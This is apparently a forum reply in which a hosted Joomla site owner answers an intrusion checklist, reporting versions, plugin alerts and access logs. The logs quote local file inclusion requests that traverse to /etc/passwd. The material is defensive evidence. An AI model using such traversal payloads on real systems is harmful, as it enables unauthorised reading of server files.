Thanks for looking into this, here is a long reply:
0) if you haven't yet, review the CERT intruder detection check list for your platform.
I am using a host so I don't think I can get access to this
1) what type of system were you running, Linux, Window, Mac?1A)
The Operating system is linux
what distribution or version?1B) what revision or patch level1C)
what is the version and patch level of your web server, and content manager
Apache version 2.2.15
PHP version 5.2.13
MySQL version 5.0.91-community
[I got the above from Cpanel]
1D) what other server applications do you have installed, e.g. what database and version.
A second Joola install
Several static html sites [web pages]
A couple of other php applications [phpurl - two of these], a php helpdesk tool [osTicket]
2) what evidence do you have of the intrusion. Specifically, what do you have that you could use to show someone that the events in question actually took place.
Joomla has a number of plug-ins. One of these [Marco's interceptor warning] sends an email to me when it detects things like attempted sql injections. On this occasion, I received multiple emails indicating multiple attempts.
This is part of one of the emails:
** Local File Inclusion [GET
ption] => /../../../../../../../../../../etc/passwd
** Local File Inclusion [REQUEST
ption] => /../../../../../../../../../../etc/passwd
**PAGE / SERVER INFO
*REMOTE_ADDR :
xx.xxx.xxx.xx
*HTTP_USER_AGENT :
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20)
*REQUEST_METHOD :
GET
*QUERY_STRING :
Itemid=1&catid=1:latest-news&id=xxxx:title-of-article-theywere-targetting-&option=/../../../../../../../../../../etc/passwd&view=article
So far, all of these attempts have failed because, as advised by joomla, I have the latest version [1.5.22] and keep an eye on their list of problem extensions and plug-ins.
As usual, I banned the ip address of the culprit and, for the time being, forgot about it.
These attempted 'sql injections' are comparatively rare on this site because they usually come from china, russia etc. most of these countries are banned by another joomla plugin. Sites that are reported by Marco's interceptor are banned using CPanel Ip deny manager. The range of IPs are also banned - not just the IP itself.
It is only with hindsight that I have realized that problems on this joomla install and other problems with other sites on the server all started after this 'attack'.
3) How much, if anything have you done to this system since the incident. Note, the less, the better.
Although a lot has been done since the attack [march 2] in actual fact it is mostly just the addition of articles & photos to the affected joomla site.
However, again with hindsight, it was when using the joomla install function that things usually go badly. Firstly, the akeeba back up facility would not work saying that it could not find directories. In an attempt to fix this I upgraded Akeeba only to result in the site playing up and eventually crashing. I resorted to getting the host to use a back up to restore the site. Akeeba still would not work so I ignored it as the rest of the site seemed okay.
Subsequently, I was installing a search plug in and again things went wrong and the host had to use an even older back up to restore the site.
So, with hindsight, it is the joomla installer which seems to crash the site. However, the reason the installer is being used is because something is malfunctioning causing one to want to upgrade or remove a plugin or component.
The site at the moment seems to be fine but I believe that a fault will appear and things will get worse and worse. If an attempt to make repairs is done by eg removing a plug in or doing an sql db repair - this will result in losing the site.
If could do the equivalent of a system restore and use a back up I have from October 2010. But, because this is a news and information site, I would lose 6 months of news!
At present, I am barely touching the site to avoid it crashing and to see if I can spot a sequence of events that cause it to fail. Again, because it's a news site, this is leading to complaints that we're not running stories we've been given.
After it dawned on me when the troubles began I went to the raw access logs. Because we're still in march i got the info - up until now, we were not archiving the logs.
This was their first visit:
xxx.xxx.xxx.xx - - [02/Mar/2011:10:40:20 -0500] "GET index.php?option=
HTTP/1.0" 404 1390 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20)"
I don’t know what this indicates: index.php?option=
They then went on to do stuff like this:
xxx.xxx.xxx.xx - [02/Mar/2011:10:47:46 -0500] "GET /index.php?Itemid=1&catid=1:latest-news&id=/../../../../../../../../../../etc/passwd&option=com_content
After checking what they had done on the web [searching terms like used above] I believe they succeeded in a RFI or LFI injection.
But, I don't know exactly what they did [eg if they changed a file - what file did they change?]
4) If it isn't too late, put a firewall in front of the system or pull the network plug.
As this is a hosted server - I can't do that
What I have done is use a commercial plug in that claims to stop such attacks. The log for this plugin and the system’s log do not work [another problem?!]
Do as little as possible while you investigate.
Apart from the odd article and test this is what I'm doing
5) how did you track the perpetrator.
As above, This was gleaned from the warning details and the logs.
Using on-line tools such as ipwhois, reverse lookup etc I was amazed to find the perpetrator is in the same country as me, using a fixed ip. On the same dedicated server he has his own website. This is a commercial company providing news & info [the same as us but in another area].
Document, but don't try to reverse-crack their system.
-I would love to be able to reverse-crack their system
Obtain the who-is and responsible party information. If you have enough information, my advice would be to contact the authorities.
I have. One police department refused to act.
The second [where the attacker is] are 'looking into it'
I was hoping to be able to say to the police do x y and z when the other party says 'no we didn't do it']
The first police officer said ‘it could be a spoofed ip’. My feeling is that this is not the case.
Your ISP may be in a position to help you in this regard.
I don't think so – it would be the host who is only interested it providing the service
I have no way of saying whether the site is definitely damaged or not. Despite the work that has gone into the site, if it crashes again it will have to be abandoned.
Because of the nature of our site a mainstream broadcaster wants to cover the story but can't because the police are investigating.
I have been told that, if I run a story to the effect of 'this is why the site is going or has been damaged xxx did it'- they'll sue me.
ps I can send you our site url and the ip of the attacker if required
